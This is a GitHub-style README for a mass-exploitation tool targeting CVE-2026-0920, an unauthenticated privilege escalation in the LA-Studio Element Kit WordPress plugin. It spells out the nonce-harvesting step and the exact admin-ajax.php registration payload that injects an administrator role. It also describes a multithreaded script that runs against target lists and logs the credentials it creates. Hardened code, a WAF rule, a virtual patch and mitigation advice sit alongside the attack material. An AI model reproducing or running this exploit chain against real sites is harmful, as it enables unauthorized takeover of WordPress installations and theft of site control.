# CVE-2026-0920

**LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter**
<div align="center">

```
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 
```

<br>

[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited)
[![CVE](https://img.shields.io/badge/CVE-2026--0920-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000)](https://www.cve.org/CVERecord?id=CVE-2026-0920)
[![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2026-0920)
[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org)
[![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#%EF%B8%8F-disclaimer)

<br>

> 📡 **The exploit drops here first.**
> Follow **[@KNxploited](https://t.me/KNxploited)** on Telegram — your elite feed for freshly disclosed CVEs, working PoCs, and precision security research. Updated relentlessly. Built for those who stay ahead.

</div>

---

## 🧠 Overview

**CVE-2026-0920** is a **CVSS 9.8 Critical** vulnerability discovered in the **LA-Studio Element Kit for Elementor** WordPress plugin.

The flaw resides in the `ajax_register_handle()` function, which processes unauthenticated user registrations via AJAX. The function fails to enforce any restriction on the `lakit_bkrole` parameter — allowing a completely unauthenticated attacker to **self-assign the `administrator` role** during registration, achieving **full WordPress admin takeover** in a single request.

| Field                  | Details                                              |
|------------------------|------------------------------------------------------|
| **CVE ID**             | CVE-2026-0920                                        |
| **Plugin**             | LA-Studio Element Kit for Elementor                  |
| **Slug**               | `lakit` / `la-studio-element-kit-for-elementor`      |
| **Affected Versions**  | All versions up to and including **1.5.6.3**         |
| **Vulnerability Type** | Unauthenticated Privilege Escalation / Admin Creation|
| **Attack Vector**      | Network — No Authentication Required                 |
| **CVSS 3.1 Score**     | **9.8 CRITICAL**                                     |
| **CVSS Vector**        | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`               |
| **CNA**                | Wordfence                                            |
| **Impact**             | Full WordPress Administrator Takeover                |
| **Researcher**         | Nxploited                                            |

---

## 💀 Vulnerability Deep Dive

The root cause is a missing role capability check inside the plugin's AJAX registration handler:

```php
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}
```

**Why this is critical:**
- `wp_ajax_nopriv_*` = accessible by **anyone with zero authentication**
- `lakit_bkrole` accepts any WordPress role string — including `administrator`
- A single POST request creates a fully privileged admin account
- The nonce required is publicly exposed in the site's front-end HTML/JS
- No rate limiting, no CAPTCHA enforcement by default, no email verification required
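For comparison, here is a hardened form of the same handler, written as an added example for this write-up. It is not the vendor's patch and not code from the plugin: it keeps the shape of the snippet above but never reads a role from the request, taking it from the site's configured default role instead and refusing any role that can manage the site. The nonce action name `lakit_ajax` and the request field `_nonce` are assumptions taken from the request shape shown later on this page; everything else is WordPress core API.

```php
// Hardened version of ajax_register_handle() (added illustration, not the vendor's fix).
// Still registered on wp_ajax_nopriv_lakit_ajax, so the checks below are what stand
// between an anonymous caller and wp_insert_user().
public function ajax_register_handle() {
    // 1. The front-end nonce must be present and valid. The nonce action name
    //    'lakit_ajax' is an assumption; use the name the plugin actually generates.
    $nonce = isset( $_POST['_nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_nonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'lakit_ajax' ) ) {
        wp_send_json_error( [ 'message' => 'Invalid request.' ], 403 );
    }

    // 2. Anonymous self-registration is only allowed when the site administrator
    //    has enabled it (Settings > General > "Anyone can register").
    if ( ! get_option( 'users_can_register' ) ) {
        wp_send_json_error( [ 'message' => 'Registration is closed.' ], 403 );
    }

    $actions = json_decode( wp_unslash( $_POST['actions'] ?? '' ), true );
    if ( ! is_array( $actions ) ) {
        wp_send_json_error( [ 'message' => 'Malformed request.' ], 400 );
    }

    foreach ( $actions as $req ) {
        if ( ( $req['action'] ?? '' ) !== 'register' || ! is_array( $req['data'] ?? null ) ) {
            continue;
        }
        $data = $req['data'];

        // 3. The role is decided server-side. A self-registered account always gets
        //    the configured default role; $data['lakit_bkrole'] is never consulted.
        $role  = get_option( 'default_role', 'subscriber' );
        $roles = wp_roles();

        // 4. Defense in depth: the chosen role must exist and must not be able to
        //    manage the site, even if the default_role option itself was tampered with.
        if ( ! $roles->is_role( $role ) || $roles->get_role( $role )->has_cap( 'manage_options' ) ) {
            $role = 'subscriber';
        }

        $user_data = [
            'user_login' => sanitize_user( (string) ( $data['username'] ?? '' ), true ),
            'user_pass'  => (string) ( $data['password'] ?? '' ),
            'user_email' => sanitize_email( (string) ( $data['email'] ?? '' ) ),
            'role'       => $role, // fixed above, not attacker controlled
        ];

        $result = wp_insert_user( $user_data );
        if ( is_wp_error( $result ) ) {
            wp_send_json_error( [ 'message' => $result->get_error_message() ], 400 );
        }
    }

    wp_send_json_success( [ 'message' => 'Account created successfully.' ] );
}
```

The important change is a single one: the role is an output of server-side policy rather than an input from the request. The nonce and `users_can_register` checks close the remaining gaps the bullet list above points out (a nonce that any visitor can read does not replace a registration policy), and the `manage_options` test means that even a misconfigured default role cannot yield an administrator.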

---

## ⚔️ Exploit Chain

```
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
```

---

## ⚙️ Requirements

```bash
pip install requests colorama
```

| Dependency   | Purpose                                        |
|--------------|------------------------------------------------|
| `requests`   | HTTP requests, session handling, cookie management |
| `colorama`   | Colored terminal output on all platforms       |
| `threading`  | Concurrent multi-target processing (standard library) |
| `re`         | Regex-based nonce extraction from HTML/JS (standard library) |

> Python **3.10+** recommended (uses `str | None` union type hints).

---

## 📂 File Structure

```
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
└── success_results.txt       # Auto-generated: pwned targets + credentials
```

---

## 🚀 Usage

### Step 1 — Configure Credentials *(Optional)*

Open `CVE-2026-0920.py` and edit the constants at the top to set your desired admin account details:

```python
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account
```

---

### Step 2 — Prepare Targets

Create `list.txt` with one target URL per line:

```
https://target1.com
https://target2.com
http://target3.com
```

> URLs without a scheme are automatically prefixed with `https://`.

---

### Step 3 — Run the Exploit

```bash
python CVE-2026-0920.py
```

You will be prompted:

```
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20
```

---

### Step 4 — Monitor Live Output

The script produces real-time, color-coded terminal output:

```
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
```

| Color       | Meaning                                          |
|-------------|--------------------------------------------------|
| 🔵 Cyan `[*]` | Informational — step in progress               |
| 🟢 Green `[+]`| Positive signal — partial or full success      |
| 🟡 Yellow `[!]`| Warning — ambiguous result, needs review      |
| 🔴 Red `[-]`  | Failure — target not exploitable or errored    |

---

### Step 5 — Review Results

Successful exploits are written to `success_results.txt`:

```
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3
```

Each line contains the full picture: target, credentials, login status, AJAX response status, and the nonce used.

---

## 🖥️ Script Parameters Reference

| Parameter         | Default                    | Description                                  |
|-------------------|----------------------------|----------------------------------------------|
| Targets file      | `list.txt`                 | File containing target URLs                  |
| Threads           | `10` (max: `50`)           | Concurrent workers                           |
| `ADMIN_EMAIL`     | `[email protected]`    | Email for injected admin account             |
| `ADMIN_PASSWORD`  | `adminSA`                  | Password for injected admin account          |
| `ADMIN_USERNAME`  | `Nx_admin`                 | Username for injected admin account          |

---

## 🔬 Verification Logic

The script performs **two-stage verification** to eliminate false positives:

```
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported
```

This eliminates false positives caused by sites that return `200 OK` on AJAX but silently fail registration.

---

## 📊 Detection Signature

The exploit generates this specific network pattern — for defenders and WAF authors:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}
```

**WAF / IDS Rule (Pseudocode):**
```
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)
```
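The same rule can be enforced inside WordPress itself while the plugin is still at a vulnerable version. The following must-use plugin is an added example for this write-up, not code from the plugin or the vendor: it hooks the same `wp_ajax_nopriv_lakit_ajax` action at priority 1, decodes the `actions` JSON the way the handler does, and ends the request with a 403 before the plugin's handler runs whenever a `register` entry carries `lakit_bkrole`. It assumes the vulnerable handler is registered at WordPress's default priority (10), as the snippet in the deep dive suggests; the function names are my own.

```php
<?php
/**
 * Plugin Name: Virtual patch for CVE-2026-0920 (added example, not the vendor's code)
 * Description: Rejects unauthenticated lakit_ajax register requests that supply
 *              lakit_bkrole. Place in wp-content/mu-plugins/ until the plugin is updated.
 */

// Assumption: the plugin registers ajax_register_handle() on this action with the
// default priority 10, so a callback at priority 1 runs first and can stop the request.
add_action( 'wp_ajax_nopriv_lakit_ajax', 'cve_2026_0920_virtual_patch', 1 );

/**
 * True when the decoded `actions` payload holds a register request that supplies
 * lakit_bkrole. Decoding the JSON instead of substring-matching the raw body means
 * re-encoded, padded or differently escaped bodies are judged on their actual content.
 */
function cve_2026_0920_is_role_injection( $raw_actions ) {
    $actions = json_decode( wp_unslash( (string) $raw_actions ), true );
    if ( ! is_array( $actions ) ) {
        return false;
    }
    foreach ( $actions as $req ) {
        if ( ! is_array( $req ) || ( $req['action'] ?? '' ) !== 'register' ) {
            continue;
        }
        $data = $req['data'] ?? null;
        if ( is_array( $data ) && array_key_exists( 'lakit_bkrole', $data ) ) {
            return true;
        }
    }
    return false;
}

function cve_2026_0920_virtual_patch() {
    if ( ! isset( $_POST['actions'] ) || ! cve_2026_0920_is_role_injection( $_POST['actions'] ) ) {
        return; // other lakit_ajax traffic is passed through to the plugin untouched
    }

    // Record enough to investigate (source address, user agent) without logging
    // the submitted credentials.
    error_log( sprintf(
        'CVE-2026-0920 blocked: ip=%s ua=%s',
        sanitize_text_field( $_SERVER['REMOTE_ADDR'] ?? '' ),
        sanitize_text_field( $_SERVER['HTTP_USER_AGENT'] ?? '' )
    ) );

    // wp_send_json_error() terminates the request, so the vulnerable handler never runs.
    wp_send_json_error( [ 'message' => 'Request rejected.' ], 403 );
}
```

Two caveats apply. First, this is containment, not a fix: it only covers the request shape documented here, so updating the plugin remains the actual remediation. Second, confirm on the installed version that the hook name and priority match, since a handler registered under a different action or an earlier priority would not be intercepted.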

---

## 🛡️ Mitigation & Remediation

If you are a **site owner, developer, or defender**, act immediately:

- ✅ **Update** LA-Studio Element Kit for Elementor to a version **above 1.5.6.3**
- ✅ **Deactivate and delete** the plugin until a confirmed patched version is installed
- ✅ **Audit** all WordPress administrator accounts — remove any unrecognized entries immediately
- ✅ **Enforce** server-side role validation — never trust user-supplied role values without a whitelist check
- ✅ **Block** unauthenticated POST requests to `admin-ajax.php` containing `lakit_bkrole` at the WAF level
- ✅ **Monitor** server and WordPress activity logs for `lakit_ajax` AJAX action calls
- ✅ **Enable** two-factor authentication on all existing admin accounts as a containment measure
- ✅ **Review** the Wordfence advisory and apply all recommended hardening steps

---

## ⚠️ Disclaimer

```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```

---

## 👤 Author

<div align="center">

|               |                                                           |
|---------------|-----------------------------------------------------------|
| **Handle**    | Nxploited                                                 |
| **Telegram**  | [@KNxploited](https://t.me/KNxploited)                   |
| **GitHub**    | [github.com/Nxploited](https://github.com/Nxploited)     |

<br>

> 🔔 **Follow [@KNxploited](https://t.me/KNxploited) on Telegram**
> Fresh CVEs. Working exploits. Deep-dive vulnerability research.
> First to know. First to act. Don't be last.

</div>

---

<div align="center">
  <sub>Engineered with precision by <strong>Nxploited</strong> · For authorized security research only · CVSS 9.8 Critical</sub>
</div>